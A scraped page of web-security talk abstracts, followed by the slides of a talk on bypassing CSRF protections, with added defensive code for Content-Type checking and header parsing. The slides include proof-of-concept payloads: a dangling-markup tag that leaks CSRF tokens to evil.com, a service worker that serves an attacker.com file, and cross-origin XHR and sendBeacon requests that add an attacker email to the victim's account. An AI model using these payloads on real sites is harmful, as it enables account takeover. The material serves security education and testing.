XSS is much more than just <script>alert(1)</script>. Thousands of unique vectors and more complex payloads can be built to evade filters and WAFs. These slides describe techniques to bypass them, from HTML to JavaScript. See also http://brutelogic.com.br/blog
A story of the passive aggressive sysadmin of AEM
# By Frans Rosén
Adobe Experience Manager is an enterprise CMS with a troubled history. It was created with the angle of high customization factor, enabling consulting firms to deploy it all over the world for huge customers.
Then came security.
Frans will go through some terrible default configuration mistakes, Adobe’s love for bad Flash and how a sysadmin accidentally exposed an international multi-billion-dollar company using only sad thoughts.
# About speaker
Frans Rosén is a tech entrepreneur, bug bounty hunter and a Security Advisor at Detectify, a security service for developers. He’s a frequent blogger at Detectify Labs and a top ranked participant of bug bounty programs, receiving some of the highest bounty payouts ever on HackerOne.
Frans was recently featured as #2 on Hackread’s list of 10 Famous Bug Bounty Hunters of All Time, and the results of his security research have been covered in numerous international publications such as Observer, BBC, Ars Technica, Wired and Mashable.
This presentation illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
Presented @ BSides Manchester 2017 & SteelCon 2017
HTTP Parameter Pollution Vulnerabilities in Web Applications (Black Hat EU 2011), by Marco Balduzzi
While input validation vulnerabilities such as XSS and SQL injection have been intensively studied, a new class of injection vulnerabilities called HTTP Parameter Pollution (HPP) has not received as much attention. HPP attacks consist of injecting encoded query string delimiters into other existing parameters. If a web application does not properly sanitize the user input, a malicious user can compromise the logic of the application to perform either client-side or server-side attacks. One consequence of HPP attacks is that the attacker can potentially override existing hard-coded HTTP parameters to modify the behavior of an application, bypass input validation checkpoints, and access and possibly exploit variables that may be out of direct reach.
In the talk we present the first automated system for the detection of HPP vulnerabilities in real web applications. Our approach consists of injecting fuzzed parameters into the web application and applying a set of tests and heuristics to determine whether the generated pages contain HPP vulnerabilities. We used this system to conduct a large-scale experiment, testing more than 5,000 popular websites and discovering unknown HPP flaws in many important and well-known sites such as Microsoft, Google, VMWare, Facebook, Symantec, Paypal and others. All of these sites have been informed and many of them have acknowledged or fixed the problems. We will explain in detail how to efficiently detect HPP bugs and how to prevent this novel class of injection vulnerabilities in future web applications.
General WAF detection and bypassing techniques. The main focus is to demonstrate how to take the right approach to analysing the behaviour of a web application firewall and then create test cases to bypass it.
This document discusses methods for bypassing file upload restrictions on websites, including modifying HTTP headers, embedding malicious code in image files, and using NULL bytes in filenames. It demonstrates how these techniques can allow uploading PHP shells or other code to gain remote command execution or full server control. The document recommends upload logs and secure coding as better security practices than trying to implement perfect input filtering, which is complicated and can still be bypassed.
This document discusses cross-site scripting (XSS) attacks and techniques for bypassing web application firewalls (WAFs) that aim to prevent XSS. It explains how XSS payloads can be embedded in XML, GIF images, and clipboard data to exploit browser parsing behaviors. The document also provides examples of encoding payloads in complex ways like JS-F**K to evade WAF signature rules.
This document discusses local file inclusion (LFI) vulnerabilities that can allow attackers to execute remote code. It explains how LFI works by dynamically including user-supplied files, and how attackers can use path traversal and null bytes to read arbitrary local files. It then describes how attackers can use LFI to execute reverse shells on the target server by including a PHP script that opens a remote connection. The document provides examples of vulnerable PHP functions and common files that can be read. It concludes by recommending input validation and whitelisting of allowed files to defend against LFI attacks.
This document discusses journeying from local file inclusion (LFI) vulnerabilities to remote code execution (RCE). It begins with an introduction and overview. It then covers LFI in detail, explaining how to find and exploit LFI vulnerabilities using directory traversal to read files. Next, it discusses remote file inclusion (RFI) and how it can lead to code execution. Prevention methods are outlined. Finally, it demonstrates exploiting LFI and RFI on a test server, verifying with phpinfo() and ping, before obtaining a reverse shell through a GET request. Common log locations are also listed.
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour, by Soroush Dalili
Although web application firewall (WAF) solutions are very useful to prevent common or automated attacks, most of them are based on blacklist approaches and are still far from perfect. This talk illustrates a number of creative techniques to smuggle and reshape HTTP requests using the strange behaviour of web servers and features such as request encoding or HTTP pipelining. These methods can come in handy when testing a website behind a WAF and can help penetration testers and bug bounty hunters to avoid drama and pain! Knowing these techniques is also beneficial for the defence team in order to design appropriate mitigation techniques. Additionally, it shows why developers should not solely rely on WAFs as the defence mechanism.
Finally, an open source Burp Suite extension will be introduced that can be used to assess or bypass a WAF solution using some of the techniques discussed in this talk. The plan is to keep improving this extension with the help of the http.ninja project.
The slides here are part of my presentation at the Confraria0day meeting in March 2017. It is an introduction to the various HTTP security headers with some insights about them. It covers HSTS, HPKP, X-Frame-Options, Content Security Policy, X-XSS-Protection, X-Content-Type-Options, Referrer-Policy and Set-Cookie options.
Directory traversal, also known as path traversal, allows attackers to access files and directories outside of the web server's designated root folder. This can lead to attacks like file inclusion, where malicious code is executed on the server, and source code disclosure, where sensitive application code is revealed. Local file inclusion allows attackers to include files from the local web server, while remote file inclusion includes files from external websites, potentially allowing remote code execution on the vulnerable server.
Going Beyond Microsoft IIS Short File Name Disclosure - NahamCon 2023 Edition, by Soroush Dalili
This document provides an introduction to short file names (SFN) in Windows and discusses issues related to inadvertently disclosing SFNs through IIS. It begins with an overview of how SFNs work and how they map to long file names. It then discusses the history of SFN disclosure through IIS and how it can be abused to reveal sensitive file names. The document provides examples of automatically and manually enumerating SFNs to discover long file names. It concludes with tips and tricks for SFN enumeration along with examples of using it to reveal parts of unknown file names.
This is a bug bounty hunter presentation given at Nullcon 2016 by Bugcrowd's Faraz Khan.
Learn more about Bugcrowd here: https://bugcrowd.com/join-the-crowd
This document discusses server-side request forgery (SSRF) exploitation. It provides examples of how SSRF can be used to access internal networks and bypass authentication by forging requests from the vulnerable server. Specific cases described include exploiting OAuth token hijacking, memcached exploitation using protocol smuggling, and exploiting vulnerabilities in libraries like TCPDF, LWP, and Postgres that enable SSRF. The document encourages finding creative ways to leverage SSRF and related vulnerabilities like open redirects, XML external entities, and SQL injection to compromise hosts and internal services.
This document provides an overview of server-side request forgery (SSRF) vulnerabilities, including what SSRF is, its impact, common attacks, bypassing filters, and mitigations. SSRF allows an attacker to induce the application to make requests to internal or external servers from the server side, bypassing access controls. This can enable attacks on the server itself or other backend systems and escalate privileges. The document discusses techniques for exploiting trust relationships and bypassing blacklists/whitelists to perform SSRF attacks. It also covers blind SSRF and ways to detect them using out-of-band techniques. Mitigations include avoiding user input that can trigger server requests, sanitizing input, whitelist
The document discusses Server Side Request Forgery (SSRF), including what it is, different types (blind and basic), ways to exploit it like bypassing filters and chaining vulnerabilities, tools that can be used for detection, and two case studies of SSRF vulnerabilities found in the wild. The first case involves using an SSRF to retrieve internal data and then storing malicious HTML in a generated PDF. The second case was an unauthenticated blind SSRF in a Jira OAuth authorization controller that was exploited through a malicious Host header.
Cross-site scripting (XSS) is an injection attack where malicious scripts are injected into otherwise trusted sites. There are three main types of XSS attacks: reflected XSS occurs via URLs, stored XSS occurs when scripts are stored in a database and delivered to users, and DOM-based XSS modifies the DOM environment. XSS attacks can lead to issues like session hijacking, phishing, and port scanning. Developers can prevent XSS by validating and encoding untrusted data, and using HTTP-only and secure flags for cookies.
The document provides instructions on how to exploit XML external entity (XXE) vulnerabilities and become a more advanced "Jedi" level hacker. It begins with XML basics and progresses through external entity attacks, file reads, port scanning, denial of service attacks, and advanced techniques like out-of-band data exfiltration and pass-the-hash attacks. The document emphasizes moving beyond just direct output to more stealthy, no-output exploitation.
(2012) Cyberspace, the new battlefield, by felixaime
Presentation given to very small groups in September 2012 on everything related to cyber defence. I am only releasing it now; sorry for the quality.
The document describes a Java class that implements a RESTful web service. It contains annotations that define the resource path, HTTP methods, request parameters, and response types. The class contains multiple methods that retrieve request parameters in different ways, such as from the URI query string, HTTP headers, request body, or the entity itself.
ORM2Pwn: Exploiting injections in Hibernate ORM, by Mikhail Egorov
Mikhail Egorov and Sergey Soldatov presented their research on exploiting injections in Hibernate ORM. They demonstrated that while Hibernate Query Language (HQL) is more limited than SQL, it is possible to exploit HQL injections to conduct SQL injections on popular databases like MySQL, PostgreSQL, Oracle, and Microsoft SQL Server. They did this by leveraging features of Hibernate and the databases like how Hibernate handles string escaping and allows unicode characters in identifiers. Their talk provided examples of exploiting each database and a takeaway that Hibernate is not a web application firewall and HQL injections can be used to perform SQL injections.
This document provides an outline for a Capture the Flag (CTF) event with details on CTF concepts, server setup, and examples of challenges. Some key points:
- It introduces CTFs and the AIS3 final CTF event, which will use a jeopardy style format across categories like Misc, Binary, Pwn, Web, and Crypto.
- It provides instructions for setting up a CTF server on Linux with tricks like disabling stack protectors, allowing code execution in the stack, and disabling address space layout randomization (ASLR) to make challenges simpler.
- It outlines some simple initial challenges like a basic buffer overflow example in C, using cryptography, and two pwn
XSS (cross-site scripting) is a common web vulnerability that allows attackers to inject client-side scripts. The document discusses various types of XSS attacks and defenses against them. It covers:
1) Reflected/transient XSS occurs when untrusted data in URL parameters is immediately displayed without sanitization. Stored/persistent XSS occurs when untrusted data is stored and later displayed. DOM-based XSS manipulates the DOM.
2) Defenses include HTML/URL encoding untrusted data before displaying it, validating all inputs, and using context-specific encoding for HTML elements, attributes, JavaScript, and URLs.
3) The OWASP Java Encoder Project and Microsoft Anti
This document discusses browser security challenges posed by new technologies like HTML5, cross-document messaging, and browser plugins. It summarizes potential attacks like cross-site scripting through relaxed origin policies, browser SQL injection using HTML5 client storage, and using cross-document messaging to enable cross-site communication. The document advocates for the OWASP Intrinsic Group to work with browser vendors to address these issues.
I took pictures from here and there by googling without mentioning all the sources; please let me know if anyone has any objection. This presentation was presented at the “securITy” Information Security Conference at BASIS SoftExpo 2012.
This talk is a generic but comprehensive overview of security mechanisms, controls and potential attacks in modern browsers. The talk also focuses on new technologies, such as HTML5 and related APIs, to highlight new attack scenarios against browsers.
This is a multi-faceted workshop that explores new concepts in web security. After a solid grounding in well-known exploits like cross-site scripting (XSS) and cross-site request forgeries (CSRF), I'll demonstrate how traditional exploits are being used together and with other technologies like Ajax to launch sophisticated attacks that penetrate firewalls, target users, and spread like worms. I'll then discuss some ideas for the future, such as evaluating trends to identify suspicious activity and understanding human tendencies and behavior to help provide a better, more secure user experience.
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek (Magno Logan)
The document discusses various web application vulnerabilities from the OWASP Top 10 list, including cross-site scripting (XSS), SQL injection, remote file inclusion, insecure direct object references, and cross-site request forgery (CSRF). It provides examples of each vulnerability type and recommendations for prevention. It also introduces Mutillidae, a deliberately vulnerable web application that can be used to demonstrate these vulnerabilities in a controlled environment.
Cross-Site Request Forgery (CSRF for short) is a kind of web application vulnerability which allows a malicious website to send unauthorized requests to a vulnerable website using the active session of its authorized users.
In simple words, it’s when an “evil” website posts a new status to your Twitter account during your visit while the login session is active on Twitter.
For security reasons the same-origin policy in browsers restricts browser-side programming languages such as JavaScript from accessing remote content.
As browser configurations may be modified, the best way to protect a web application against CSRF is to secure the web application itself.
This document provides an overview of a training session on secure JavaScript development. The training will cover topics like DOM-based XSS vulnerabilities, JSON security issues like parsing and hijacking, mitigating clickjacking, security aspects of HTML5 features like cross-origin requests and client-side storage, and things developers should avoid in JavaScript code. The trainer is an expert in security research and tools development with a focus on browser and JavaScript security.
OWASP Portland - OWASP Top 10 For JavaScript Developers, by Lewis Ardern
With the release of the OWASP TOP 10 2017 we saw new issues rise as contenders of most common issues in the web landscape. Much of the OWASP documentation displays issues, and remediation advice/code relating to Java, C++, and C#; however not much relating to JavaScript. JavaScript has drastically changed over the last few years with the release of Angular, React, and Vue, alongside the popular use of NodeJS and its libraries/frameworks. This talk will introduce you to the OWASP Top 10 explaining JavaScript client and server-side vulnerabilities.
Best practices of web app security (Samvel Gevorgyan), ClubHack
This document discusses best practices for web application security in 2010. It covers common vulnerabilities like cross-site scripting, SQL injection, information leakage, and cross-site request forgery. For each vulnerability, it provides descriptions, examples, and solutions. The top solutions mentioned are OWASP HTML Purifier for cross-site scripting, GreenSQL open source database firewall for SQL injection, and OWASP CSRFGuard for cross-site request forgery. The document aims to help web developers protect their applications from various security risks.
The document summarizes various techniques for exploiting vulnerabilities in web applications, including exploiting logged out XSS vulnerabilities, CSRF protected XSS, XSS via HTTP headers, file upload issues, and encoding tricks for SQL injection. It discusses using techniques like browser password managers, session fixation, persistent data stores, and Flash to circumvent protections.
This document provides an overview of unusual web application security bugs and exploitation techniques discussed by Alex Kuznetsov, including exploiting logged out XSS vulnerabilities, CSRF protected XSS, XSS via HTTP headers, file upload issues, PHP oddities, SQL injection encoding attacks, and more obscure bugs involving cookies, timing attacks, and cookie policies. The talk outlines new and creative ways to bypass input validation and achieve remote code execution or sensitive data disclosure on vulnerable sites.
In this talk we will demonstrate and unveil the latest developments on browser specific weaknesses including creative new mechanisms to compromise confidentiality, successfully perform login and history detection, serve mixed content, deliver malicious ghost binaries without a C&C server, exploit cache / timing side channels to extract secrets from third-party domains and leverage new HTML5 features to carry out more stealthy attacks. This is a fast-paced practical presentation with live demos that will challenge your knowledge of the Same Origin Policy and push the limits of what is possible with today’s web clients.
Topics will include: Current XSS filter bypass for IE & Chrome. Same Origin Policy timing attacks on Chrome. Data URI malware with spoofed URLs and ‘download’ attribute. HTML5 drag & drop exploitation. History stealing attacks. Clipboard stealing attacks. Cross-domain hijacking attacks with flash content sniffing, Blob URLs and SVGs. Spoofing URL address bars on modern browsers. Advanced browser encoding quirks and exploitation techniques.
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S..., by Divyanshu
Browser exploitation | Reporting vulnerabilities in top browsers and finding CVEs.
Session in Null Bangalore Meet 23 November 2019 Null/OWASP/G4H combined meetup
Thanks to respective researchers for their work.
The document summarizes various web application vulnerabilities from 2010, including client-side attacks like cross-site scripting (XSS) and cross-site request forgery (CSRF), and server-side attacks like SQL injection, XML injection, and remote code execution via stored procedures. It provides examples of exploiting these vulnerabilities on modern web applications and defenses against these attacks.
XSS (cross-site scripting) is a client-side vulnerability that allows injection of malicious JavaScript which can then be run on a victim's browser. The document discusses different types of XSS (non-persistent, persistent, DOM-based), examples of how to perform basic and advanced XSS attacks, ways XSS has been used on major websites, and how attackers can exploit XSS vulnerabilities for activities like session hijacking, cookie stealing, clickjacking, and more.
A Hacker's perspective on AEM applications security, by Mikhail Egorov
Mikhail Egorov gave a presentation on security vulnerabilities in Adobe Experience Manager (AEM) applications. He discussed three vulnerabilities - CVE-2019-8086, CVE-2019-8087, and CVE-2019-8088 - which involved XML external entity injection, JavaScript code injection, and ways to exploit them. He explained the technical details of each vulnerability and provided examples of payloads and steps required for exploitation. Egorov concluded by recommending keeping AEM updated, blocking anonymous write access to certain paths, and removing demo content to help prevent security issues.
What’s wrong with WebSocket APIs? Unveiling vulnerabilities in WebSocket APIs, by Mikhail Egorov
This document discusses vulnerabilities in WebSocket APIs. It begins with an introduction to the speaker and overview of WebSocket protocols. It then covers specific vulnerabilities like cross-site WebSocket hijacking, authentication issues, and request smuggling through WebSocket connections. The document demonstrates these vulnerabilities through challenges on public sites. It concludes with ideas for further research on WebSocket security.
New methods for exploiting ORM injections in Java applications, by Mikhail Egorov
This document summarizes new methods for exploiting ORM injections in Java applications. It begins with introductions to ORM, JPA, and common ORM libraries. It then outlines several exploitation techniques, including using special functions in EclipseLink and TopLink to call database functions, abusing string handling and quote processing in OpenJPA, and leveraging features in Hibernate and specific databases like string escaping, quoted strings, magic functions, and Unicode delimiters. Code examples and demonstrations are provided for most of the techniques.
4. Why do CSRF attacks still work in 2017?
- A lot of web apps still use cookies for session management
- CSRF-protection bypasses
- The SameSite cookies feature is not widely implemented:
  - supported only by the Chrome and Opera browsers
  - changes are required on the server side
5. CSRF in 2017
- Will be excluded from the OWASP Top 10 Project 2017
- P2 (High) category in the Bugcrowd VRT* (App-Wide CSRF)
* https://bugcrowd.com/vulnerability-rating-taxonomy
6. Popular CSRF-protections
- CSRF token
- Double submit cookie
- Content-Type based protection
- Referer-based protection
- Password confirmation (websudo)
- SameSite Cookies (Chrome, Opera)
8. CSRF bypasses – still work for me

| Bypass | CSRF Tokens | Double Submit Cookie | CT-based | Referer-based | SameSite Cookies |
|---|---|---|---|---|---|
| XSS | All | All | All | All | All |
| Dangling markup | All | - | - | - | All* |
| Subdomain issues | All | All | All | - | All* |
| Cookie Injection | - | All | - | - | All* |
| Change CT | - | - | All | - | All* |
| Non-simple CT | - | - | All with Flash plugin, IE11/FF ESR with Pdf plugin | - | All* |
| Bad Pdf | IE11/FF ESR with Pdf plugin | - | IE11/FF ESR with Pdf plugin | - | All* |
| Spoof Referer | - | - | - | IE11/FF ESR with Pdf plugin, Edge | All* |

All – works for all browsers
All* – all browsers except browsers that support SameSite Cookies (Chrome & Opera)
9. Bypass with XSS (1/8)
- An XSS in the web app allows the attacker to bypass the majority of CSRF-protections
- Just deal with it!!!
10. Bypass with Dangling markup (2/8)
- The web app has HTML injection but not XSS (CSP, …)
- The attacker can leak the CSRF-token with an unclosed tag that swallows the rest of the page into a cross-origin request:
<img src='https://evil.com/log_csrf?html=
<form action='http://evil.com/log_csrf'><textarea>
11. Bypass with subdomain (3/8)
- Suppose subdomain foo.example.com is vulnerable to XSS or subdomain takeover or cookie injection
- The attacker can bypass:
  - CSRF-token protection
  - Double-submit cookie protection
  - Content-Type based protection
12. Bypass with subdomain (3/8)
- The web app uses CORS for interaction with subdomains
- The attacker can read the CSRF-token when the response carries:
Access-Control-Allow-Origin: https://foo.example.com
Access-Control-Allow-Credentials: true
13. Bypass with subdomain (3/8)
- There is an XSS on foo.example.com
- The main domain contains a crossdomain.xml
- The attacker can upload JS files to foo.example.com
<cross-domain-policy>
<allow-access-from domain="*.example.com" />
</cross-domain-policy>
14. Bypass with subdomain (3/8)
- The attacker can utilize a Service Worker for foo.example.com to read the CSRF-token through Flash
- Amazon CSRF - https://ahussam.me/Amazon-leaking-csrf-token-using-service-worker/
// Service worker registered on the vulnerable subdomain: every fetch is answered with the attacker's SWF
var url = "https://attacker.com/bad.swf";
onfetch = (e) => {
  e.respondWith(fetch(url));
}
15. Bypass with subdomain (3/8)
- The attacker can inject cookies for the parent domain with the desired path
- The browser will choose the cookie that has the more specific path (the injected one)
- He can then bypass double submit cookie CSRF-protection
16. Bypass with bad PDF (4/8)
- The PDF plugin from Adobe supports FormCalc scripting
- The Adobe PDF plugin currently works in IE11 and Firefox ESR
- The get() and post() methods of FormCalc allow the attacker to exfiltrate the CSRF-token
- Kudos to @insertScript
17. Bypass with bad PDF (4/8)
- Suppose the attacker can upload a PDF file to example.com and share it
- The uploaded file is accessible through an API from example.com
- Tip: the attacker tries to upload the PDF file as a file of another format (an image file)
- The PDF plugin doesn’t care about the Content-Type or Content-Disposition headers … it just works …
19. Bypass with bad PDF (4/8)
https://attacker.com/csrf-pdf.html:
<h1>Nothing to see here!</h1>
<embed src="https://example.com/shard/x1/sh/leak.pdf" width="0" height="0"
type='application/pdf'>
20. Bypass with Cookies injection (5/8)
- The attacker can bypass double submit cookie protection through cookie injection
- Variants of cookie injection:
  - CRLF-injection
  - Browser bugs (like CVE-2016-9078 in Firefox)
  - Etc.
21. Bypass by changing CT (6/8)
- Developers seriously assume that a non-standard data format in the body (i.e. binary) stops CSRF
- Sometimes the backend doesn’t validate the Content-Type header
22. Bypass with PDF plugin (6/8)
POST /user/add/note HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com
Cookie: JSESSIONID=728FAA7F23EE00B0EDD56D1E220C011E.jvmroute8081;
Connection: close
Content-Type: application/x-thrift
Content-Length: 43

[43-byte binary Thrift body for the addNote call; not reproducible as text]
23. Bypass with PDF plugin (6/8)
https://attacker.com/csrf-thrift.html:
<script>
var request = new XMLHttpRequest();
request.open('POST', 'https://example.com/add/note', true);
request.withCredentials = true;
// text/plain is a "simple" content type, so the browser sends the request without a preflight
request.setRequestHeader("Content-type", "text/plain");
var data = ['0x80','0x01','0x00','0x01','0x00','0x00','0x00','0x07','0x67','0x65','0x74','0x55',
            '0x73','0x65','0x72','0x00','0x00','0x00','0x00','0x0b','0x00','0x01','0x00','0x00','0x00','0x00','0x00'];
var bin = new Uint8Array(data.length);
for (var i = 0; i < data.length; i++) {
  bin[i] = parseInt(data[i], 16);
}
request.send(bin);
</script>
24. Bypass with arbitrary CT (7/8)
- Via HTML forms or the XHR API the attacker can send only “simple” content types:
  - text/plain
  - application/x-www-form-urlencoded
  - multipart/form-data
25. Bypass with arbitrary CT (7/8)
- How to send an arbitrary Content-Type header?
  - Bugs in browsers (the famous navigator.sendBeacon in Chrome)
  - Flash plugin + 307 redirect
  - PDF plugin + 307 redirect
  - Some backend frameworks support URL-parameters to redefine the Content-Type: http://cxf.apache.org/docs/jax-rs.html#JAX-RS-Debugging
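Slides 21, 24 and 25 together describe what a Content-Type based protection has to get right: reject the three simple types outright, require the exact media type the endpoint expects rather than merely "not a form", refuse any query-parameter override of the content type, and still verify the request origin because a browser bug or plugin may produce a non-simple type. The gate below is an added example (not code from the slides or from EasyCSRF) written for a Node.js JSON endpoint; the `ALLOWED_ORIGIN`, the `ctype` override parameter name and all request objects are constructed for the example, so substitute your framework's real parameter names.

```javascript
// Added example: strict Content-Type and origin gate for a JSON API (Node.js).

// The content types an HTML form or plain XHR can send cross-origin without preflight.
const SIMPLE_CONTENT_TYPES = new Set([
  'text/plain',
  'application/x-www-form-urlencoded',
  'multipart/form-data',
]);
const ALLOWED_ORIGIN = 'https://example.com';   // assumed site origin
const CT_OVERRIDE_PARAMS = ['ctype'];           // placeholder names for framework override params

// RFC 7231 media type: token "/" token (parameters handled separately).
const MEDIA_TYPE = /^[!#$%&'*+.^_`|~0-9a-z-]+\/[!#$%&'*+.^_`|~0-9a-z-]+$/;

// Parse "type/subtype; param=value" into the lower-cased media type and its parameters.
function parseContentType(header) {
  if (typeof header !== 'string') return null;
  const parts = header.split(';').map((s) => s.trim().toLowerCase());
  const type = parts[0];
  if (!MEDIA_TYPE.test(type)) return null;
  return { type, params: parts.slice(1) };
}

// Prefer Origin, fall back to Referer, and reject when neither is present:
// a silently missing header is exactly what spoofing tricks aim for.
function originOk(headers) {
  const origin = headers.origin;
  if (origin) return origin === ALLOWED_ORIGIN;
  const referer = headers.referer;
  if (!referer) return false;
  try {
    return new URL(referer).origin === ALLOWED_ORIGIN;
  } catch (e) {
    return false;
  }
}

// Returns null when the request may proceed, otherwise the rejection reason.
function csrfGate(req, expectedType = 'application/json') {
  const ct = parseContentType(req.headers['content-type']);
  if (!ct) return 'missing or malformed Content-Type';
  if (SIMPLE_CONTENT_TYPES.has(ct.type)) return 'simple content type refused';
  if (ct.type !== expectedType) return 'unexpected media type ' + ct.type;
  const query = req.query || {};
  if (CT_OVERRIDE_PARAMS.some((p) => p in query)) return 'content type override parameter refused';
  if (!originOk(req.headers)) return 'origin check failed';
  return null;
}

// Constructed requests covering the cases the slides describe.
function sampleRequests() {
  return {
    // form / XHR from attacker.com, simple type, no preflight
    formPost: { headers: { 'content-type': 'text/plain', origin: 'https://attacker.com' }, query: {} },
    // sendBeacon-style JSON from attacker.com: type is right, origin is not
    beaconJson: { headers: { 'content-type': 'application/json;charset=utf-8', origin: 'https://attacker.com' }, query: {} },
    // binary body sent under a different non-simple type than the endpoint expects
    thriftBody: { headers: { 'content-type': 'application/x-thrift', referer: 'https://example.com' }, query: {} },
    // same-origin request that tries to redefine the type through the query string
    overridden: { headers: { 'content-type': 'application/json', origin: 'https://example.com' }, query: { ctype: 'application/json' } },
    legitimate: { headers: { 'content-type': 'application/json', origin: 'https://example.com' }, query: {} },
    refererOnly: { headers: { 'content-type': 'application/json', referer: 'https://example.com/settings' }, query: {} },
  };
}
```

Run `csrfGate` before the body is parsed: the type check costs nothing, and a request that reaches the JSON parser with `text/plain` or a form type has already been accepted by mistake. The origin check is what keeps the gate useful when a browser or plugin bug lets a non-simple type through.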
26. Bypass with arbitrary CT (7/8)
- Bug in Chrome: https://bugs.chromium.org/p/chromium/issues/detail?id=490015
- Publicly known for 2 years (2015-2017) - WTF!!!
- A navigator.sendBeacon() call allowed sending a POST request with an arbitrary content type
27. Bypass with arbitrary CT (7/8)
https://attacker.com/csrf-sendbeacon.html:
<script>
function jsonreq() {
  var data = '{"action":"add-user-email","Email":"attacker@evil.com"}';
  var blob = new Blob([data], {type : 'application/json;charset=utf-8'});
  navigator.sendBeacon('https://example.com/home/rpc', blob);
}
jsonreq();
</script>
28. Bypass with arbitrary CT (7/8)
- How it works (Flash plugin + 307 redirect): http://research.rootme.in/forging-content-type-header-with-flash/
29. Bypass with Referer spoof (8/8)
- Bug in MS Edge, kudos to @magicmac2000: https://www.brokenbrowser.com/referer-spoofing-patch-bypass/
- It still works, but for GET requests only
- Maybe your backend doesn’t distinguish GET and POST requests?
31. Bypass with Referer spoof (8/8)
- The PDF plugin will send the HTTP header line without a colon:
Referer http://example.com
- Some backends (e.g. JBoss / WildFly) treat the space as a colon (end of the header name), i.e. they parse the line as
Name :Value
and so read it as a Referer header with the value http://example.com
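The slide above turns on a single parsing decision: whether a space may terminate a header name. RFC 7230 defines a header line as `field-name ":" OWS field-value`, with the field name a token that cannot contain whitespace. The following is an added example (not code from the slides or from any of the backends named) that puts the lenient behaviour the slide describes next to a strict parser, run over a constructed header block; the `Cookie` value is a placeholder.

```javascript
// Added example: lenient vs. RFC 7230-strict header line parsing (Node.js).

// RFC 7230 token characters; a field-name must consist of these only.
const TOKEN = /^[!#$%&'*+.^_`|~0-9A-Za-z-]+$/;

// Models the behaviour the slide attributes to some backends: the first
// space or colon ends the name, so "Referer http://x" becomes a Referer header.
function parseHeaderLineLenient(line) {
  const m = /^([^:\s]+)\s*:?\s*(.*)$/.exec(line);
  return m ? { name: m[1].toLowerCase(), value: m[2].trim() } : null;
}

// Strict: the name is everything before the first colon and must be a token,
// so "Referer http://example.com" and "Name :Value" are both malformed.
function parseHeaderLineStrict(line) {
  const idx = line.indexOf(':');
  if (idx <= 0) return null;
  const name = line.slice(0, idx);
  if (!TOKEN.test(name)) return null;
  return { name: name.toLowerCase(), value: line.slice(idx + 1).trim() };
}

// Parse a whole header block; a strict server answers a malformed line with 400
// rather than guessing what the client meant.
function parseHeaders(rawLines, parseLine) {
  const headers = {};
  for (const line of rawLines) {
    const h = parseLine(line);
    if (!h) return { error: 'malformed header line: ' + line };
    headers[h.name] = h.value;
  }
  return { headers };
}

// Constructed header block shaped like the one the slide describes the plugin sending.
const SAMPLE_LINES = [
  'Host: example.com',
  'Referer http://example.com',
  'Cookie: JSESSIONID=PLACEHOLDER',
];
```

Under the lenient parser the block yields `referer = http://example.com`, which is precisely the spoof a Referer-based CSRF check would then trust; under the strict parser the same block is rejected as malformed. Checking that the server (or the reverse proxy in front of it) parses header names strictly is a cheaper mitigation than trying to enumerate every client that can emit odd header lines.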
32. Tips for bughunters
- There are a lot of APIs that have CSRF-protection based on content type
- Check subdomains for vulnerabilities (XSS, subdomain takeover, cookie injection)
- The trick with PDF uploading works well
- Convert a url-encoded body with a CSRF-token to JSON format without the CSRF-token
34. EasyCSRF for Burp
- EasyCSRF works for Burp Suite Free Edition, 223 SLOC in Jython
- Download from https://github.com/0ang3el/EasyCSRF
- Works as a Proxy Listener (IProxyListener)
- Modifies requests on the fly (removes CSRF parameters/headers, changes method, etc.)
- Highlights modified requests in Proxy History
- You can visually judge in the browser which modified requests failed/succeeded (error messages, no modification occurred, etc.)